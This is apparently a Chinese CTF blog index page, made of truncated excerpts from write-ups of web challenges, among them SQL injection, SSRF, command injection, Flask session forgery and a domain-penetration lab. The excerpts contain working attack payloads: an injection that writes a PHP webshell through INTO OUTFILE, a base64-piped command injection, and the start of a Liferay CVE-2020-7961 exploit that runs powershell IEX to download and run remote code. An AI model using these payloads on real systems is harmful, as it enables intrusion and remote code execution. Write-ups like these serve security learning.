easyci 注apache配置文件出来得到web路径为:/var/sercet/html/ 写shell,大小写绕过 password=a&username=-1' uNion sElect 1,'<?php eval($_POST[1]);?>' into outfile '/var/sercet/html/9.php'--+ hello_php www.zip源码...
easyci 注apache配置文件出来得到web路径为:/var/sercet/html/ 写shell,大小写...
阅读全文>>虽然题目质量不错。 //但是被注入恶心到的两天 签到 直接读flag读不到,读源码发现是curl,可以二次编码绕过 Payload: http://47.104.232.98:49725/?url=file:///fla%25%36%37 Hi_433MHz 导入au,短的是0,长的是1: 得到: 011001100 011011000 011000010 011001110 011110...
虽然题目质量不错。 //但是被注入恶心到的两天 签到 直接读flag读不到,读源码发现是curl,可以二次编码绕过...
阅读全文>>Command 签到题,过滤了如下: base64+%09绕一下过滤,因为匹配大小写,所以可能会出现这种情况: 稍微加点空格什么的修修改改就行了,payload: ?url=|echo%09"Y2FcdCAvZXRjLy5maW5kZmxhZy8q"|base64%09-d|ba\s\h flaskbot 通过各种让他报错拿到一份大概的源码: 可以看到这里用了render_templ...
Command 签到题,过滤了如下: base64+%09绕一下过滤,因为匹配大小写,所以可能会出现这种情况: ...
阅读全文>>最后的xss some攻击学到了(虽然比赛遇到也许还是不会 Resume.yml Writing your resume on word is for rookies. Real programmers use yaml. ~~I hope I don't have any bugs~~ URL: https://resume-yml.appsecil.ctf.today/ By Meit...
最后的xss some攻击学到了(虽然比赛遇到也许还是不会 Resume.yml Writing your re...
阅读全文>>文章首发于:合天 web1 输入1点击输入框后会显示如下参数: ?id=1&limit=1 看下源码能得到这么两句sql语句: <!-- $query = "SELECT * FROM fake_flag WHERE id = $id limit 0,$limit"; //$query = "SELECT flag FROM real_flag WHERE id = $id ...
文章首发于:合天 web1 输入1点击输入框后会显示如下参数: ?id=1&limit=1 看下源码能得到...
阅读全文>>easycon 简单题,连上马儿后发现目录下有个bbb的txt文件,解码base64后的图片就是flag了。 BlackCat view-source:http://183.129.189.60:10022/Hei_Mao_Jing_Chang.mp3 拉到最底下有源码: ```php if(empty($_POST['Black-Cat-Sheriff']) || empty($_POST...
easycon 简单题,连上马儿后发现目录下有个bbb的txt文件,解码base64后的图片就是flag了。 Bl...
阅读全文>>upload wireshark导出对象后会有一个图片,根据文件名知道是steghide隐写,密码123456。 Funhash ```php <?php include 'conn.php'; highlight_file("index.php"); //level 1 if ($_GET["hash1"] != hash("md4", $_GET["hash1"])) { ...
upload wireshark导出对象后会有一个图片,根据文件名知道是steghide隐写,密码123456。 ...
阅读全文>>easyphp 源码给出: ```php <?php //题目环境:php:7.4.8-apache $pid = pcntl_fork(); if ($pid == -1) { die('could not fork'); }else if ($pid){ $r=pcntl_wait($status); ...
easyphp 源码给出: ```php <?php //题目环境:php:7.4.8-apache...
阅读全文>>文章首发于:合天 最近跑了培训写了点flask的session伪造,没能用上,刚好整理了一下先前的资料把flask三种考过的点拿出来写写文章。 debug pin 本地先起一个开启debug模式的服务: ```python -- coding: utf-8 -- from flask import Flask app = Flask(name) @app.route("/") def hel...
文章首发于:合天 最近跑了培训写了点flask的session伪造,没能用上,刚好整理了一下先前的资料把flask...
阅读全文>>SU的师傅们太顶了,全程被带飞,贡献度为0 XD 其他的题目环境下了+自己太菜了来不及复现。 web_checkin(v1) php <?php highlight_file(__FILE__); require_once 'flag.php'; if(isset($_GET['file'])) { require_once $_GET['file']; } v1版本是出题人忘记改...
SU的师傅们太顶了,全程被带飞,贡献度为0 XD 其他的题目环境下了+自己太菜了来不及复现。 web_checki...
阅读全文>>简单的域渗透1 一血,感觉是非预期?前面直接用powercat弹shell,后面怎么都弹不到了? Liferay的cve:CVE-2020-7961 ```java public class Exploit { static { try { String[] cmd = {"cmd.exe", "/c", "powershell IEX (New-Object System.Net.Webc...
简单的域渗透1 一血,感觉是非预期?前面直接用powercat弹shell,后面怎么都弹不到了? Liferay的...
阅读全文>>_ _ _ _ ___ ___ | | | | | | | | \/ | | |_| | |__ | |__ | . . | | _ | '_ \| '_ \| |\/| | | | | | | | | | | | | | | \_| |_/_| |_|_| |_\_| |_/